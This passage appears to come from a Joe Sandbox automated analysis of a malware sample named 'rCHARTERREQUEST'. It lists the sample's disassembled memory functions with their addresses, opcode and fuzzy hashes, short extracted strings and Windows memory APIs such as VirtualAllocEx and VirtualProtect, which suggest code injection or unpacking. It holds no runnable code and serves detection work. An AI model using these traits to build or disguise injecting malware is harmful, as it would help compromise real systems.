                                                                                                          Function 06D83DA1 Relevance: 1.6, APIs: 1, Instructions: 61memoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 06D83E1C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934788263.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d80000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ProtectVirtual
                                                                                                          • String ID:
                                                                                                          • API String ID: 544645111-0
                                                                                                          • Opcode ID: a5aad98641ddc611165057cc25c499a8083c8fa91e13665c90468b24f13115e1
                                                                                                          • Instruction ID: 0a68f2c894cb637387cdc965bb33842ed734c8b7c665680576b873903ee9b019
                                                                                                          • Opcode Fuzzy Hash: a5aad98641ddc611165057cc25c499a8083c8fa91e13665c90468b24f13115e1
                                                                                                          • Instruction Fuzzy Hash: 872118B1D002499FDB10DFAAC845BEFBBF5EF88320F148429D459A7250C7789945CFA1
                                                                                                          Function 06D83DA8 Relevance: 1.6, APIs: 1, Instructions: 59memoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 06D83E1C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934788263.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d80000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ProtectVirtual
                                                                                                          • String ID:
                                                                                                          • API String ID: 544645111-0
                                                                                                          • Opcode ID: 4fcf1fbaf2234567145b7a71f1d0203b17df4c5fcece000b751d19a0f4555cd7
                                                                                                          • Instruction ID: aabac538b14497b6354272034fe60b63e0ce0d70aa8a1bde367041e0e981daac
                                                                                                          • Opcode Fuzzy Hash: 4fcf1fbaf2234567145b7a71f1d0203b17df4c5fcece000b751d19a0f4555cd7
                                                                                                          • Instruction Fuzzy Hash: EE2127B1C002499FDB10DFAAC844BEEFBF4EF88320F14842AD459A7250C778A944CFA5
                                                                                                          Function 0643B550 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0643B5C6
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1931040088.0000000006430000.00000040.00000800.00020000.00000000.sdmp, Offset: 06430000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6430000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AllocVirtual
                                                                                                          • String ID:
                                                                                                          • API String ID: 4275171209-0
                                                                                                          • Opcode ID: 7253ce00d0dedad3456c4cdd7467c95b616aaabc1487372c5600bf65873cc62f
                                                                                                          • Instruction ID: 12b6aada15b056a86e49c40fca9ef5a29cdff88476093e7e72c9f828d8f9af6e
                                                                                                          • Opcode Fuzzy Hash: 7253ce00d0dedad3456c4cdd7467c95b616aaabc1487372c5600bf65873cc62f
                                                                                                          • Instruction Fuzzy Hash: 811136B19002499FCB10DFAAC844AEEFFF5FF48324F108829E559A7250CB75A550CFA0
                                                                                                          Function 06DADBD8 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • VirtualProtect.KERNEL32(?,?,?,?), ref: 06DADC4C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934843193.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6da0000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ProtectVirtual
                                                                                                          • String ID:
                                                                                                          • API String ID: 544645111-0
                                                                                                          • Opcode ID: eb3a4309847dda0c7aa09248d3e584dc39ff81efce6d916cfa1fe90404598fff
                                                                                                          • Instruction ID: 7bf004b81f08cf29a40ee0df1ac8227351e69c7aaece5531b0512bcb8f42fe2d
                                                                                                          • Opcode Fuzzy Hash: eb3a4309847dda0c7aa09248d3e584dc39ff81efce6d916cfa1fe90404598fff
                                                                                                          • Instruction Fuzzy Hash: 2011E3B19042499FCB10DFAAC984AAEFBF5AF88320F10842AD459A7250C775A944CFA5
                                                                                                          Function 0643B558 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0643B5C6
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1931040088.0000000006430000.00000040.00000800.00020000.00000000.sdmp, Offset: 06430000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6430000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AllocVirtual
                                                                                                          • String ID:
                                                                                                          • API String ID: 4275171209-0
                                                                                                          • Opcode ID: 60a64ecd18e84c0ae6ab0c416ba084a4641e6486ecaefdde2b04da871908d43d
                                                                                                          • Instruction ID: afaff7f357653f6d99c514bb2f5bf39da1de39b5139791fbb64dd38161633ee3
                                                                                                          • Opcode Fuzzy Hash: 60a64ecd18e84c0ae6ab0c416ba084a4641e6486ecaefdde2b04da871908d43d
                                                                                                          • Instruction Fuzzy Hash: 221137719002499FCB10DFAAC844BEFBFF5EF88324F10882AE559A7250C775A544CFA4
                                                                                                          Function 06D420F8 Relevance: 1.5, Strings: 1, Instructions: 238COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934615546.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d40000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 4'^q
                                                                                                          • API String ID: 0-1614139903
                                                                                                          • Opcode ID: 1bb7ea66f560580503b8559b9bc267ab929675b1bafbb7d6e638c02fea101c1e
                                                                                                          • Instruction ID: eeb8c2649a985f944158a2341bfe9b60c081cca6265b798e43b3e81ce71f82cf
                                                                                                          • Opcode Fuzzy Hash: 1bb7ea66f560580503b8559b9bc267ab929675b1bafbb7d6e638c02fea101c1e
                                                                                                          • Instruction Fuzzy Hash: DFA1FD34A10218DFCB44EFA4D898A9DBBB2FF89300F558159E915AB365DB30ED86CF50
                                                                                                          Function 06B80F12 Relevance: 1.5, Strings: 1, Instructions: 205COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1933005482.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6b80000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: @
                                                                                                          • API String ID: 0-2766056989
                                                                                                          • Opcode ID: f3951cbc9950f59ac0eb6f186f62106082c09fb53d6d2eb30b6bba1d1a562d67
                                                                                                          • Instruction ID: fc8b004c72a7af0ef5e893b5a39f5a6a36ead077e48a981866bbd52fc05fb5a8
                                                                                                          • Opcode Fuzzy Hash: f3951cbc9950f59ac0eb6f186f62106082c09fb53d6d2eb30b6bba1d1a562d67
                                                                                                          • Instruction Fuzzy Hash: 8FA191B4A45229CFDBA4EF69D884B99BBB2FB8A304F1081D9D409A7340D7385E85CF51
                                                                                                          Function 06D48BE8 Relevance: 1.4, Strings: 1, Instructions: 188COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934615546.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d40000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: (bq
                                                                                                          • API String ID: 0-149360118
                                                                                                          • Opcode ID: f334cd3067fb6bf857f04f28e7a022c898c3ae769e3d4cbe89951bd1dd34d5f3
                                                                                                          • Instruction ID: bb5e4a4c0ba2a7a193c32a25c9433d828c153d299be8ae0b81b38a0a6c2b57e2
                                                                                                          • Opcode Fuzzy Hash: f334cd3067fb6bf857f04f28e7a022c898c3ae769e3d4cbe89951bd1dd34d5f3
                                                                                                          • Instruction Fuzzy Hash: B3716A34B00614CFCB44EB64D894AADB7F2EF88700F508569D5169B3A4DB75ED82CBA1
                                                                                                          Function 0180C678 Relevance: 1.4, Strings: 1, Instructions: 166COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1917776226.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_1800000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: TJcq
                                                                                                          • API String ID: 0-1911830065
                                                                                                          • Opcode ID: c311f0470ba062f7bb6dece42f2ef0589fcf9c216f71f4a28980b48899efdc49
                                                                                                          • Instruction ID: 07d29e39b2929238e7dc9aa4b44bbb70bfb662673caea0e75e8fdde43123d1b4
                                                                                                          • Opcode Fuzzy Hash: c311f0470ba062f7bb6dece42f2ef0589fcf9c216f71f4a28980b48899efdc49
                                                                                                          • Instruction Fuzzy Hash: 0F71E478E0020D9FCB55EFA9D8446AEBBF2FB89304F109029E525AB394DB385985CB51
                                                                                                          Function 018017BF Relevance: 1.4, Strings: 1, Instructions: 164COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1917776226.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_1800000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: tocq
                                                                                                          • API String ID: 0-4013956356
                                                                                                          • Opcode ID: 01566227a9b0dc9e2a4475537c64c3e66e057f9a5e1ddef8e21a89ae4686abf8
                                                                                                          • Instruction ID: a107be8790084205c9e4cefac9dfa0574e8431fd6cce181f9c4eb9476f9531cb
                                                                                                          • Opcode Fuzzy Hash: 01566227a9b0dc9e2a4475537c64c3e66e057f9a5e1ddef8e21a89ae4686abf8
                                                                                                          • Instruction Fuzzy Hash: AD615934B00208CFD795CB69D948BA977F2FB89324F6580A4E505DB3A9CB39DE85CB11
                                                                                                          Function 06D3C868 Relevance: 1.4, Strings: 1, Instructions: 162COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934546099.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d30000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: (bq
                                                                                                          • API String ID: 0-149360118
                                                                                                          • Opcode ID: ab47854e912b7794ce9dda1326655aad373da6ca3709dd8e2b88a055e6773913
                                                                                                          • Instruction ID: 39d7af93b482ad7f1775dfed7a7ed2eec984f26c888b38d4ee8cf8227d4709ce
                                                                                                          • Opcode Fuzzy Hash: ab47854e912b7794ce9dda1326655aad373da6ca3709dd8e2b88a055e6773913
                                                                                                          • Instruction Fuzzy Hash: 13511531A112268FCB01CF69C84496AFBB5FF85325F168296E555AB381D730FC51CBE0
                                                                                                          Function 06D3B8A8 Relevance: 1.4, Strings: 1, Instructions: 157COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934546099.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d30000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: pbq
                                                                                                          • API String ID: 0-3896149868
                                                                                                          • Opcode ID: 9b5b4760766e60e0c448d4cdec0585aa2912c33d78213a520802596a7fd3d58b
                                                                                                          • Instruction ID: 8c201d24a7c9bb752cb36dcf06cdd009e75cb6e932c04ee8d22f89febbfbd61e
                                                                                                          • Opcode Fuzzy Hash: 9b5b4760766e60e0c448d4cdec0585aa2912c33d78213a520802596a7fd3d58b
                                                                                                          • Instruction Fuzzy Hash: 05517C76640104AFCB469FA9C904D6ABFF7FF8C31071680D5E2098B276DA36DC62EB51
                                                                                                          Function 018017D0 Relevance: 1.4, Strings: 1, Instructions: 155COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1917776226.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_1800000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: tocq
                                                                                                          • API String ID: 0-4013956356
                                                                                                          • Opcode ID: cc165d07be5e2eff6521ad81028a0fe59b4f89d0f445138d5c083a9ed8299cc1
                                                                                                          • Instruction ID: 81f1012ca3b1bd4fac803a6bcf7f36198e601b971a91e3370273d22db8502efb
                                                                                                          • Opcode Fuzzy Hash: cc165d07be5e2eff6521ad81028a0fe59b4f89d0f445138d5c083a9ed8299cc1
                                                                                                          • Instruction Fuzzy Hash: 33516934B00108CFD795CB6AD948BA977F2FB88324F6480A4E5059B3A9CB34DE85CB51
                                                                                                          Function 06D46DF8 Relevance: 1.4, Strings: 1, Instructions: 152COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934615546.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d40000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: (bq
                                                                                                          • API String ID: 0-149360118
                                                                                                          • Opcode ID: cfe28d7489f13ef10c46bb7081da46db680c52ba3f96924c5fca1dadfddf952b
                                                                                                          • Instruction ID: 45082a0e40d7741027748a0479030fa75385835ac29bfe4ee3550bb10c51722e
                                                                                                          • Opcode Fuzzy Hash: cfe28d7489f13ef10c46bb7081da46db680c52ba3f96924c5fca1dadfddf952b
                                                                                                          • Instruction Fuzzy Hash: FB518F36604250AFC7469F69D814D5A7FB6EF8931071680EAE209CF372CA36DC11DB65
                                                                                                          Function 018019C4 Relevance: 1.4, Strings: 1, Instructions: 149COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1917776226.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_1800000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: tocq
                                                                                                          • API String ID: 0-4013956356
                                                                                                          • Opcode ID: 6de85e0409df2350d28946fec7355b76fc9f4a6826257c23d36a9a986082695f
                                                                                                          • Instruction ID: 2b1accd0e6a292420e10647bd0dde130ce38aa50d6bdf995c25e25cedb515fd7
                                                                                                          • Opcode Fuzzy Hash: 6de85e0409df2350d28946fec7355b76fc9f4a6826257c23d36a9a986082695f
                                                                                                          • Instruction Fuzzy Hash: AB516B38B00108CFD795CB69D948BA977F2FF88324F6580A4E5059B3A9C734DE85CB51
                                                                                                          Function 06D45D99 Relevance: 1.4, Strings: 1, Instructions: 145COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934615546.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d40000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 4'^q
                                                                                                          • API String ID: 0-1614139903
                                                                                                          • Opcode ID: 7a0ea93a1354b47604b7bfe3b4e09390cda6cafe7fff0de6d87ada4fee2e4ebb
                                                                                                          • Instruction ID: bfc39053ba999b0b6ca84995f6e6fe8c0303b38198e52477988e9a99a72cd180
                                                                                                          • Opcode Fuzzy Hash: 7a0ea93a1354b47604b7bfe3b4e09390cda6cafe7fff0de6d87ada4fee2e4ebb
                                                                                                          • Instruction Fuzzy Hash: 66417B30B106148FCB94BB64D854AAEB7BBEFC9600F504429E416AB394CF749D869BA1
                                                                                                          Function 06D41170 Relevance: 1.4, Strings: 1, Instructions: 122COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934615546.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d40000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 4'^q
                                                                                                          • API String ID: 0-1614139903
                                                                                                          • Opcode ID: b4a9a3664b866269c1b76dab2e283647310bb3374c7e33a2fb0f21d45838b7b3
                                                                                                          • Instruction ID: 695de15efc7faac58feccc87d8d5d127c78ec1244c20f70e44b7c149fe66bbe7
                                                                                                          • Opcode Fuzzy Hash: b4a9a3664b866269c1b76dab2e283647310bb3374c7e33a2fb0f21d45838b7b3
                                                                                                          • Instruction Fuzzy Hash: A231D331B402149FCF599F54D894DAEBBB7EF88310B1540A9EA0ADB375CA31DC46CB90
                                                                                                          Function 06D42509 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934615546.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d40000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 4'^q
                                                                                                          • API String ID: 0-1614139903
                                                                                                          • Opcode ID: f56b989d5dc37fbd39adeb15f06cf999b231a16ccfecac4902cf024ba1c9ce79
                                                                                                          • Instruction ID: 28dd59919c545c31467cafba02ebaab25275b2bcd563b58c3ab9cacfc7786b47
                                                                                                          • Opcode Fuzzy Hash: f56b989d5dc37fbd39adeb15f06cf999b231a16ccfecac4902cf024ba1c9ce79
                                                                                                          • Instruction Fuzzy Hash: A741E674A40218DFD748DF64D998AAEB7B2FF88704F214158E9069B3A5CB75ED82CB40
                                                                                                          Function 06D3C158 Relevance: 1.4, Strings: 1, Instructions: 101COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934546099.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d30000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: (bq
                                                                                                          • API String ID: 0-149360118
                                                                                                          • Opcode ID: a3e2a646b958589a0e08e32e3e3ae9219292b04a821c934cc80db3a6ec654311
                                                                                                          • Instruction ID: 32f2369a87355ca5d831d8c94a0318691880c0735c3406e941912f3ef63368fb
                                                                                                          • Opcode Fuzzy Hash: a3e2a646b958589a0e08e32e3e3ae9219292b04a821c934cc80db3a6ec654311
                                                                                                          • Instruction Fuzzy Hash: 703122367042656FD7155F6AD8409AFBFAAEFC9360B14403AF905CB3A0DE718C16C7A0
                                                                                                          Function 06B436CB Relevance: 1.3, Strings: 1, Instructions: 82COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1932794004.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6b40000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 4'^q
                                                                                                          • API String ID: 0-1614139903
                                                                                                          • Opcode ID: 0c462fc577d89ea661b65a3c94300ec5e11d84e898f14901d95602204ef2bdde
                                                                                                          • Instruction ID: 11c3442fa111680aa711872b02b0a8e87c31d38f364be589f6ebe40e82ef44b7
                                                                                                          • Opcode Fuzzy Hash: 0c462fc577d89ea661b65a3c94300ec5e11d84e898f14901d95602204ef2bdde
                                                                                                          • Instruction Fuzzy Hash: 72319AB0D09249DFEB5AEFA6C454AEEBBF1EF45300F0440AAD011A7381C7381A45CFA1
                                                                                                          Function 06B8C58F Relevance: 1.3, Strings: 1, Instructions: 77COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1933005482.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6b80000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: p<^q
                                                                                                          • API String ID: 0-1680888324
                                                                                                          • Opcode ID: 4729f3e4c20353b7e8981d826f60b60a3de8d806f4fb34e62ccbe9f9c8d065bd
                                                                                                          • Instruction ID: aa2c456ecc2b82ff2904ea9304073802ff7b5b22b0442ad8d2d4df76e6e12fbe
                                                                                                          • Opcode Fuzzy Hash: 4729f3e4c20353b7e8981d826f60b60a3de8d806f4fb34e62ccbe9f9c8d065bd
                                                                                                          • Instruction Fuzzy Hash: 9C216DB13042549FCB419F2AC844AAA7FEAEF8A210F1550A6F905CB2B1CB35DC51CB70
                                                                                                          Function 06B8C5A0 Relevance: 1.3, Strings: 1, Instructions: 72COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1933005482.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6b80000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: p<^q
                                                                                                          • API String ID: 0-1680888324
                                                                                                          • Opcode ID: cfd2e741f3616b02ff74519a490a6b2cd7cfe2c28b54d78ac7a91d082144bd9f
                                                                                                          • Instruction ID: 813223d8b8a604095b0d7f8603fd7f6ca5bf64df714c50a2e02e40dc43704580
                                                                                                          • Opcode Fuzzy Hash: cfd2e741f3616b02ff74519a490a6b2cd7cfe2c28b54d78ac7a91d082144bd9f
                                                                                                          • Instruction Fuzzy Hash: E22138B13002589FCB45DF2AC840AAA7FEAEF89210B1590A5FE55CB3A1CB35DC51CB70
                                                                                                          Function 06D3FCBE Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934546099.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d30000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Hbq
                                                                                                          • API String ID: 0-1245868
                                                                                                          • Opcode ID: 50b699789c17b65be5592011cf92c13532009770dc94c3fcc772e6d070782eee
                                                                                                          • Instruction ID: 56ffebbf34ee6a1b3a89afb132c76fb14ccbd802958b831c1e309da98a2aa78f
                                                                                                          • Opcode Fuzzy Hash: 50b699789c17b65be5592011cf92c13532009770dc94c3fcc772e6d070782eee
                                                                                                          • Instruction Fuzzy Hash: 6A215E31B402648FC799EF78D448B6A7BF69F95200B1404AED0069F3A1DE71DC06CBA1
                                                                                                          Function 06DAEBC0 Relevance: 1.3, APIs: 1, Instructions: 52memoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • VirtualAlloc.KERNEL32(?,?,?,?), ref: 06DAEC2B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934843193.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6da0000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AllocVirtual
                                                                                                          • String ID:
                                                                                                          • API String ID: 4275171209-0
                                                                                                          • Opcode ID: 4604c6c9f103c045444f777e13df7a8391cba4e9d6f77ae7d3eb5fb204793000
                                                                                                          • Instruction ID: 3b491351803ecd6633d01a9fd97ee87ea6575d8a0137ce0b1a6a5c14847aeae1
                                                                                                          • Opcode Fuzzy Hash: 4604c6c9f103c045444f777e13df7a8391cba4e9d6f77ae7d3eb5fb204793000
                                                                                                          • Instruction Fuzzy Hash: 611134B19003489FCB10DFAAC844BEEFFF5EB88320F248829D569A7250C775A544CFA4
                                                                                                          Function 06D3875E Relevance: 1.3, Strings: 1, Instructions: 30COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934546099.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d30000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Te^q
                                                                                                          • API String ID: 0-671973202
                                                                                                          • Opcode ID: 933a077eb3b35268546c061251ab7bda9d20fb2c4df1afda5a2e46c476955602
                                                                                                          • Instruction ID: 021d3d9cddba518a58455910bed452d5f2192f32558ace58ab4a7ec557a78e71
                                                                                                          • Opcode Fuzzy Hash: 933a077eb3b35268546c061251ab7bda9d20fb2c4df1afda5a2e46c476955602
                                                                                                          • Instruction Fuzzy Hash: FA01AEB4E00268CFCB64DF68D984B9DBBF2BB99304F104095E589A7380C7789E858F01
                                                                                                          Function 06B885A7 Relevance: 1.3, Strings: 1, Instructions: 24COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1933005482.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6b80000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 2
                                                                                                          • API String ID: 0-450215437
                                                                                                          • Opcode ID: 0df7d6a9d6a719327cd13ac8003cb84e796fe5a87c5b5a09d95953f7c573df2e
                                                                                                          • Instruction ID: e190ad708ab96e365d4b0d05241e3ed32cb2790d9af0771af5ee8b809af52a81
                                                                                                          • Opcode Fuzzy Hash: 0df7d6a9d6a719327cd13ac8003cb84e796fe5a87c5b5a09d95953f7c573df2e
                                                                                                          • Instruction Fuzzy Hash: F3F0F4B4A51119DFEB54DF48E884FADB7F2FB45318F1040A9E909A7280C7389D80CF21
                                                                                                          Function 07042163 Relevance: 1.3, Strings: 1, Instructions: 23COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1935005830.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7040000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: -
                                                                                                          • API String ID: 0-2547889144
                                                                                                          • Opcode ID: 7f73e166c1bab65f2742aaee654f81f3bb8116095df683e0b27a49dfe6c71c6d
                                                                                                          • Instruction ID: c8ab498963d73e6ab7c8b9225239bd5b598d06eb59bf3d93db0b9a1d9054d386
                                                                                                          • Opcode Fuzzy Hash: 7f73e166c1bab65f2742aaee654f81f3bb8116095df683e0b27a49dfe6c71c6d
